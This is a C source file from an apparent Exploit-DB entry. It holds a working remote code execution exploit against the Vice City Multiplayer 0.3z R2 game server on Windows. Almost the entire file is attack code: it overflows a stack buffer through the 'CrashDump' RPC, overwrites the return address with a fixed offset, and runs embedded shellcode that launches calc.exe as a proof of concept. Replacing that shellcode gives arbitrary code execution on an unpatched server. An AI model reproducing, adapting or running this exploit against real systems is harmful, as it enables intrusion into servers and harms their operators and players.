140 lines
No EOL
2.9 KiB
C
140 lines
No EOL
2.9 KiB
C
/*
|
|
Exploit Title: Vice City Multiplayer remote code execution (Server)
|
|
Date: 22/08/2012
|
|
Exploit Author: Sasuke78200 (Benjaa Toufik)
|
|
Software Link:
|
|
http://www.vicecitymultiplayer.com/downloads/03z_r2/server0.3zr2(pawn)(win)(updated2).zip
|
|
Version: 0.3z R2
|
|
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
|
|
Windows Server 2008, it should work on all Windows.
|
|
|
|
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20758.tar.gz
|
|
*/
|
|
|
|
#include "main.h"
|
|
|
|
/*
|
|
Written by Sasuke78200
|
|
http://sasuke78200.blogspot.fr/
|
|
|
|
*/
|
|
|
|
|
|
RakClientInterface* pClientInterface;
|
|
|
|
|
|
void Exploit()
|
|
{
|
|
unsigned long iLen;
|
|
unsigned char aBuffer[4096];
|
|
RakNet::BitStream* pBitStream;
|
|
|
|
unsigned char aShellCode[] =
|
|
{
|
|
0xE8, 0x25, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC,
|
|
0x80, 0x00, 0x00, 0x00, 0x6A, 0x01, 0x6A, 0x00,
|
|
0x6A, 0x00, 0x53, 0x68, 0x78, 0x82, 0x44, 0x00,
|
|
0x6A, 0x00, 0xB8, 0x94, 0x61, 0x44, 0x00, 0xFF,
|
|
0x10, 0x6A, 0x00, 0xB8, 0x00, 0x61, 0x44, 0x00,
|
|
0xFF, 0x10, 0xE8, 0xD6, 0xFF, 0xFF, 0xFF, 0x63,
|
|
0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
|
|
/* Compiled version of */
|
|
//USE32
|
|
|
|
//_start:
|
|
// call _string
|
|
|
|
//_begin:
|
|
// pop ebx
|
|
// sub esp, 0x80
|
|
|
|
// ; ShellExecuteA(0, "open", "calc.exe", 0, 0, SW_SHOWNORMAL);
|
|
// push 1
|
|
// push 0
|
|
// push 0
|
|
// push ebx
|
|
// push 0x448278 ; offset of "open" on the server
|
|
// push 0x00
|
|
// mov eax, 0x446194
|
|
// call [eax]
|
|
|
|
// ; ExitProcess(0); To avoid a crash
|
|
// push 0
|
|
// mov eax, 0x446100
|
|
// call [eax]
|
|
|
|
//_string:
|
|
// call _begin
|
|
// db "calc.exe"
|
|
// db 0
|
|
};
|
|
|
|
pBitStream = new RakNet::BitStream();
|
|
|
|
memset(aBuffer, 0x49, sizeof(aBuffer));
|
|
|
|
iLen = 588; // limit of the stack on Windows
|
|
|
|
// New EIP (stack pointer)
|
|
|
|
*(unsigned long*)&aBuffer[iLen] = 0x4165E6; // Windows
|
|
iLen += 4; // EIP
|
|
*(unsigned long*)&aBuffer[iLen] = 0x90909090;
|
|
iLen += 4;
|
|
memcpy(&aBuffer[iLen], aShellCode, sizeof(aShellCode));
|
|
iLen += sizeof(aShellCode);
|
|
|
|
|
|
|
|
pBitStream->Write((unsigned int)iLen);
|
|
pBitStream->Write((char*)aBuffer, iLen);
|
|
|
|
|
|
pClientInterface->RPC("CrashDump", pBitStream, HIGH_PRIORITY, RELIABLE, 0, false, UNASSIGNED_NETWORK_ID, 0);
|
|
delete pBitStream;
|
|
}
|
|
|
|
int main()
|
|
{
|
|
|
|
Packet* pPacket;
|
|
|
|
pClientInterface = RakNetworkFactory::GetRakClientInterface();
|
|
pClientInterface->Connect("127.0.0.1", 5192, 0, 0, 20);
|
|
|
|
|
|
for(;;)
|
|
{
|
|
while((pPacket = pClientInterface->Receive()) != 0)
|
|
{
|
|
switch(pPacket->data[0])
|
|
{
|
|
case ID_CONNECTION_REQUEST_ACCEPTED:
|
|
{
|
|
puts("Connected ...");
|
|
Exploit();
|
|
break;
|
|
}
|
|
case ID_CONNECTION_LOST:
|
|
{
|
|
puts("Connection time out\nCode executed ? :)");
|
|
break;
|
|
}
|
|
case ID_RECEIVED_STATIC_DATA:
|
|
{
|
|
break;
|
|
}
|
|
default:
|
|
{
|
|
printf("packet id %d received lenght %d bytes\n", pPacket->data[0], pPacket->length);
|
|
}
|
|
}
|
|
|
|
pClientInterface->DeallocatePacket(pPacket);
|
|
}
|
|
|
|
|
|
}
|
|
|
|
return 0;
|
|
} |